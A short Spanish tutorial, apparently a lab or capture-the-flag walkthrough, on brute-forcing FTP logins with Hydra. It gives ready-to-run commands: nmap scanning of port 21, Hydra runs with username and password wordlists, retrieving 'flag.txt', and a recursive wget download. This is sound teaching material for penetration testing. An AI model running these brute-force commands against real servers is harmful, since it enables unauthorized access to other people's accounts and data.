CRACKEAR PASSWORD CON HYDRA
Hydra es una herramienta de fuerza bruta que ayuda a los evaluadores de penetración y a los piratas informáticos éticos a descifrar las contraseñas de los servicios de red.
Hydra puede realizar ataques rápidos de diccionario contra más de 50 protocolos. Esto incluye telnet, FTP, HTTP, HTTPS, SMB, bases de datos y varios otros servicios.
Hydra fue desarrollado por el grupo de hackers » [The Hacker’s Choice](https://www.thc.org/) «. Hydra se lanzó por primera vez en 2000 como una herramienta de prueba de concepto que demostraba cómo se pueden realizar ataques a los servicios de inicio de sesión de red.
Hydra también es un cracker de inicio de sesión paralelizado. Esto significa que puedes tener más de una conexión en paralelo. A diferencia de la fuerza bruta secuencial, esto reduce el tiempo necesario para descifrar una contraseña.
apt install hydra
sudo su
nmap -p 21 [IP-Address]
sudo su
hydra -L /home/attacker/Desktop/Wordlists/Usernames.txt -P /home/attacker/Desktop/Wordlists/Passwords.txt ftp://192.128.1.4
Hydra prueba varias combinaciones de nombres de usuario y contraseñas (presentes en los archivos Usernames.txt y Passwords.txt) en el servidor FTP y genera nombres de usuario y contraseñas crackeados, como se muestra en la captura de pantalla.
hydra -l user -P passlist.txt ftp://192.128.1.4
ftp://192.128.1.4
get flag.txt
wget -r ftp://direccion-del-servidor.com/directorio